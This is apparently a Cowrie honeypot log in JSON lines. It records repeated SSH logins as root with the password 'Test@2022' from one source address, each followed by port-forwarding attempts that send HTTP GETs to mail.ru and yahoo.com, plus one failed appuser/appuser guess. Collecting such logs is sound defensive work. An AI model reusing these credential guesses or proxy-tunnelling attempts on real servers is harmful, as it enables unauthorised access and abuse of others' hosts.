{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34124,"dst_ip":"1.2.3.4","dst_port":22,"session":"6295afdd1137","protocol":"ssh","message":"New connection: 77.83.207.83:34124 (1.2.3.4:22) [session: 6295afdd1137]","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.274919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.275800Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.325949Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.577150Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22673,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22673","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.628772Z","session":"6295afdd1137"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.679389Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23937,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23937","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.820881Z","session":"6295afdd1137"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:29.871475Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":15990,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15990","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.012694Z","session":"6295afdd1137"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.063113Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.114568Z","src_ip":"77.83.207.83","session":"6295afdd1137"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34218,"dst_ip":"1.2.3.4","dst_port":22,"session":"66194e981acf","protocol":"ssh","message":"New connection: 77.83.207.83:34218 (1.2.3.4:22) [session: 66194e981acf]","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.163808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.174494Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.214567Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.466041Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22655,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22655","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.517472Z","session":"66194e981acf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.567753Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7139,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7139","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.708627Z","session":"66194e981acf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.758888Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":7327,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7327","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.900677Z","session":"66194e981acf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:30.951024Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.002699Z","src_ip":"77.83.207.83","session":"66194e981acf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34310,"dst_ip":"1.2.3.4","dst_port":22,"session":"de92499c4d01","protocol":"ssh","message":"New connection: 77.83.207.83:34310 (1.2.3.4:22) [session: de92499c4d01]","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.052796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.053919Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.105179Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.360855Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23461,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23461","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.413324Z","session":"de92499c4d01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.464603Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":14129,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14129","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.609928Z","session":"de92499c4d01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.661240Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":8885,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8885","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.805637Z","session":"de92499c4d01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.856936Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.909701Z","src_ip":"77.83.207.83","session":"de92499c4d01"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.933095Z","src_ip":"212.227.125.160","session":"86eacc4d7083"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34408,"dst_ip":"1.2.3.4","dst_port":22,"session":"45d3ab732c70","protocol":"ssh","message":"New connection: 77.83.207.83:34408 (1.2.3.4:22) [session: 45d3ab732c70]","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.958991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:31.969795Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.009532Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.session.closed","duration":12.773346185684204,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.113956Z","src_ip":"212.227.235.229","session":"63014cf1da4c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.260488Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2855,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2855","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.312413Z","session":"45d3ab732c70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63763,"dst_ip":"1.2.3.4","dst_port":23,"session":"dbee577dddb3","protocol":"telnet","message":"New connection: 212.227.235.229:63763 (1.2.3.4:23) [session: dbee577dddb3]","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.346023Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.362690Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12979,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12979","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.504717Z","session":"45d3ab732c70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.555079Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":26406,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26406","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.696697Z","session":"45d3ab732c70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.747140Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.798728Z","src_ip":"77.83.207.83","session":"45d3ab732c70"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34506,"dst_ip":"1.2.3.4","dst_port":22,"session":"39aa6a83b619","protocol":"ssh","message":"New connection: 77.83.207.83:34506 (1.2.3.4:22) [session: 39aa6a83b619]","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.850077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.860498Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:32.902800Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.164413Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20623,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20623","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.217746Z","session":"39aa6a83b619"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:33.270580Z","src_ip":"77.83.207.83","session":"39aa6a83b619"}
